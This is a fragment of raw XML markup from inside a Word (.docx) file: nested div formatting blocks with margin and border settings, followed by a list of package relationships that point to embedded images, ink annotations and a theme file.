                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="2057504210">
                      <w:marLeft w:val="0"/>
                      <w:marRight w:val="0"/>
                      <w:marTop w:val="0"/>
                      <w:marBottom w:val="0"/>
                      <w:divBdr>
                        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                      </w:divBdr>
                    </w:div>
                  </w:divsChild>
                </w:div>
                <w:div w:id="24991681">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="17295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505109">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="300304712">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="53360462">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="438719187">
                      <w:marLeft w:val="0"/>
                      <w:marRight w:val="0"/>
                      <w:marTop w:val="0"/>
                      <w:marBottom w:val="0"/>
                      <w:divBdr>
                        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                      </w:divBdr>
                    </w:div>
                  </w:divsChild>
                </w:div>
                <w:div w:id="782920632">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="89582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86729">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1972437177">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="1525434096">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="1407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792420">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="214630467">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="1441948275">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="3749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096413">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="2147119155">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="1515193468">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="2119060508">
                      <w:marLeft w:val="0"/>
                      <w:marRight w:val="0"/>
                      <w:marTop w:val="0"/>
                      <w:marBottom w:val="0"/>
                      <w:divBdr>
                        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                      </w:divBdr>
                    </w:div>
                  </w:divsChild>
                </w:div>
                <w:div w:id="129784718">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="3342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9259">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1877352687">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="1882472258">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="843322135">
                      <w:marLeft w:val="0"/>
                      <w:marRight w:val="0"/>
                      <w:marTop w:val="0"/>
                      <w:marBottom w:val="0"/>
                      <w:divBdr>
                        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                      </w:divBdr>
                    </w:div>
                  </w:divsChild>
                </w:div>
                <w:div w:id="1331441527">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="16767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244274">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="5451000">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="1925675647">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="197240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271041">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1852527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3.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.png"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image26.png"/><Relationship Id="rId63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image39.png"/><Relationship Id="rId84" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image51.png"/><Relationship Id="rId138" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image83.png"/><Relationship Id="rId159" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="ink/ink59.xml"/><Relationship Id="rId170" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image105.png"/><Relationship Id="rId191" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image118.png"/><Relationship Id="rId205" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image131.png"/><Relationship Id="rId107" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image65.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="ink/ink1.xml"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image19.png"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image34.jpeg"/><Relationship Id="rId74" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image45.png"/><Relationship Id="rId128" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="ink/ink47.xml"/><Relationship Id="rId149" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image90.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.png"/><Relationship Id="rId95" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image57.png"/><Relationship Id="rId160" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image97.png"/><Relationship Id="rId181" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image112.png"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="ink/ink6.xml"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="ink/ink13.xml"/><Relationship Id="rId64" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="ink/ink21.xml"/><Relationship Id="rId118" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image71.png"/><Relationship Id="rId139" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image84.png"/><Relationship Id="rId85" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image52.png"/><Relationship Id="rId150" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="ink/ink56.xml"/><Relationship Id="rId171" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="ink/ink62.xml"/><Relationship Id="rId192" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="ink/ink70.xml"/><Relationship Id="rId206" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image132.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="ink/ink10.xml"/><Relationship Id="rId108" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="ink/ink39.xml"/><Relationship Id="rId129" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image78.png"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="ink/ink16.xml"/><Relationship Id="rId75" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image46.png"/><Relationship Id="rId96" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image58.png"/><Relationship Id="rId140" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image85.png"/><Relationship Id="rId161" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="ink/ink60.xml"/><Relationship Id="rId182" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="ink/ink66.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.png"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.png"/><Relationship Id="rId119" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image72.png"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image27.png"/><Relationship Id="rId65" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image40.png"/><Relationship Id="rId86" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="ink/ink30.xml"/><Relationship Id="rId130" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="ink/ink48.xml"/><Relationship Id="rId151" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image91.png"/><Relationship Id="rId172" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image106.png"/><Relationship Id="rId193" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image119.png"/><Relationship Id="rId207" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image133.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="ink/ink2.xml"/><Relationship Id="rId109" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image66.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image20.png"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image35.png"/><Relationship Id="rId76" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="ink/ink26.xml"/><Relationship Id="rId97" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image59.png"/><Relationship Id="rId120" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="ink/ink44.xml"/><Relationship Id="rId141" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="ink/ink52.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.png"/><Relationship Id="rId162" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image98.png"/><Relationship Id="rId183" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image113.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="ink/ink7.xml"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image28.png"/><Relationship Id="rId66" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="ink/ink22.xml"/><Relationship Id="rId87" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image53.png"/><Relationship Id="rId110" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image67.png"/><Relationship Id="rId131" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image79.png"/><Relationship Id="rId152" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="ink/ink57.xml"/><Relationship Id="rId173" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="ink/ink63.xml"/><Relationship Id="rId194" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image120.jpeg"/><Relationship Id="rId208" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image134.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customXml" Target="ink/ink17.xml"/><Relationship Id="rId77" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image47.png"/><Relationship Id="rId100" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image61.png"/><Relationship Id="rId105" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="ink/ink38.xml"/><Relationship Id="rId126" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="ink/ink46.xml"/><Relationship Id="rId147" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image89.png"/><Relationship Id="rId168" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image103.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="ink/ink15.xml"/><Relationship Id="rId72" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image44.png"/><Relationship Id="rId93" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image56.png"/><Relationship Id="rId98" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="ink/ink35.xml"/><Relationship Id="rId121" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image73.png"/><Relationship Id="rId142" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image86.png"/><Relationship Id="rId163" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="ink/ink61.xml"/><Relationship Id="rId184" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image114.png"/><Relationship Id="rId189" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image117.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1.png"/><Relationship Id="rId116" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image70.png"/><Relationship Id="rId137" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image82.png"/><Relationship Id="rId158" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image96.png"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="ink/ink5.xml"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image25.png"/><Relationship Id="rId62" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="ink/ink20.xml"/><Relationship Id="rId83" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="ink/ink29.xml"/><Relationship Id="rId88" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="ink/ink31.xml"/><Relationship Id="rId111" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="ink/ink40.xml"/><Relationship Id="rId132" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="ink/ink49.xml"/><Relationship Id="rId153" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image92.png"/><Relationship Id="rId174" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image107.png"/><Relationship Id="rId179" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image110.png"/><Relationship Id="rId195" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image121.png"/><Relationship Id="rId209" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image135.png"/><Relationship Id="rId190" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="ink/ink69.xml"/><Relationship Id="rId204" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image130.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.png"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="ink/ink11.xml"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image36.png"/><Relationship Id="rId106" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image64.png"/><Relationship Id="rId127" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image77.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.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customXml" Target="ink/ink25.xml"/><Relationship Id="rId78" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image48.png"/><Relationship Id="rId94" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="ink/ink34.xml"/><Relationship Id="rId99" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image60.png"/><Relationship Id="rId101" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="ink/ink36.xml"/><Relationship Id="rId122" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image74.png"/><Relationship Id="rId143" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="ink/ink53.xml"/><Relationship Id="rId148" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="ink/ink55.xml"/><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11.png"/><Relationship Id="rId210" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image136.png"/><Relationship Id="rId215" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="ink/ink8.xml"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image30.png"/><Relationship Id="rId68" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="ink/ink23.xml"/><Relationship Id="rId89" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image54.png"/><Relationship Id="rId112" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image68.png"/><Relationship Id="rId133" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image80.png"/><Relationship Id="rId154" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image93.png"/><Relationship Id="rId175" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image108.png"/><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customXml" Target="ink/ink3.xml"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22.png"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="ink/ink18.xml"/><Relationship Id="rId79" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="ink/ink27.xml"/><Relationship Id="rId102" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image62.png"/><Relationship Id="rId123" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="ink/ink45.xml"/><Relationship Id="rId144" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image87.png"/><Relationship Id="rId90" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="ink/ink32.xml"/><Relationship Id="rId165" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image100.png"/><Relationship Id="rId186" 